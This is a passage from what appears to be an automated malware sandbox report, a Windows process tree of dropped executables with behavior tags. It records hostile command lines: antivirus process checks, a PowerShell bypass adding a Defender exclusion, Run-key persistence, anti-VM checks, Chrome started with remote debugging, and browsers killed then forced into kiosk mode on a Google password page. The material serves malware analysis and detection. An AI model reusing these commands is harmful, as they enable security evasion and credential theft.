- Scheduled Task/Job: Scheduled Task
PID:5620
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Drops startup file
- Executes dropped EXE
PID:2664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1728
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1112
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4792
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2104
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3652
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2332
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2300
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4980
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4984
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4184
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2668
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4296
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1124
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:5064
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2188
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4020
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4328
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:552
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2964
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3424
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1684
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:904
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3992
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1476
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4460
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2560
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3868
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4140
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3192
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3352
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2224
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4560
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4704
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3616
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3568
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3904
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1084
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3592
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4868
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4508
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4992
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1844
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3056
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3508
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1708
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2716
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4388
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4104
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3340
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2952
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1776
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1236
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4248
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3692
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3768
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2432
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2416
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3104
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3436
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4480
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3516
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2004
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4360
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:5080
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4716
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4472
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4148
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3136
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1664
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2776
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3460
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2412
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1832
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3272
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:1856
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2472
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:992
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4208
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3004
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2576
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:3920
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:4932
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"4⤵PID:2728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"3⤵
- Executes dropped EXE
PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"3⤵
- Executes dropped EXE
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3076
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4688 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat4⤵PID:1600
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:4436
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:3696
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1844
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:580
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7245985⤵PID:1732
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "WowLiberalCalOfficer" Weight5⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y5⤵
- System Location Discovery: System Language Discovery
PID:1948
-
-
C:\Users\Admin\AppData\Local\Temp\724598\Thermal.pifThermal.pif y5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:4792 -
C:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exe6⤵
- Suspicious use of SetWindowsHookEx
PID:4488
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:4224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\1.exe"3⤵
- Adds Run key to start application
PID:2008 -
C:\Windows\system32\cmd.execmd /c "yo.bat"4⤵PID:3056
-
C:\Windows\system32\net.exenet session5⤵PID:1196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session6⤵PID:3116
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\AddExclusion.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
PID:1708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\valid.exe"C:\Users\Admin\AppData\Local\Temp\Files\valid.exe"3⤵
- Adds Run key to start application
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\N2P23.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\N2P23.exe4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Y9Q63.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Y9Q63.exe5⤵
- Adds Run key to start application
PID:3076 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Z45e8.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Z45e8.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5000 -
C:\Users\Admin\AppData\Local\Temp\1006262001\build.exe"C:\Users\Admin\AppData\Local\Temp\1006262001\build.exe"8⤵PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\1006311001\e3e353915c.exe"C:\Users\Admin\AppData\Local\Temp\1006311001\e3e353915c.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\1006312001\6d85c101d5.exe"C:\Users\Admin\AppData\Local\Temp\1006312001\6d85c101d5.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5236
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"8⤵PID:696
-
-
C:\Users\Admin\AppData\Local\Temp\1006314001\97252a0aa2.exe"C:\Users\Admin\AppData\Local\Temp\1006314001\97252a0aa2.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 7249⤵
- Program crash
PID:5848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2s3369.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2s3369.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3272
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P43S.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P43S.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4504 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
PID:4396 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x12c,0x130,0x134,0x100,0x138,0x7feef2d9758,0x7feef2d9768,0x7feef2d97787⤵PID:3444
-
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:1832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1368,i,12895479208706601006,1507227341026231068,131072 /prefetch:27⤵PID:4340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1452 --field-trial-handle=1368,i,12895479208706601006,1507227341026231068,131072 /prefetch:87⤵PID:4752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1488 --field-trial-handle=1368,i,12895479208706601006,1507227341026231068,131072 /prefetch:87⤵PID:1344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1368,i,12895479208706601006,1507227341026231068,131072 /prefetch:17⤵
- Uses browser remote debugging
PID:2564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2364 --field-trial-handle=1368,i,12895479208706601006,1507227341026231068,131072 /prefetch:17⤵
- Uses browser remote debugging
PID:3172
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DocumentsAKKEHIECFC.exe"6⤵PID:2008
-
C:\Users\Admin\DocumentsAKKEHIECFC.exe"C:\Users\Admin\DocumentsAKKEHIECFC.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3388
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4i221v.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4i221v.exe4⤵
- System Location Discovery: System Language Discovery
PID:788 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3332
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- Kills process with taskkill
PID:3672
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3808
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:2144
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
PID:2216 -
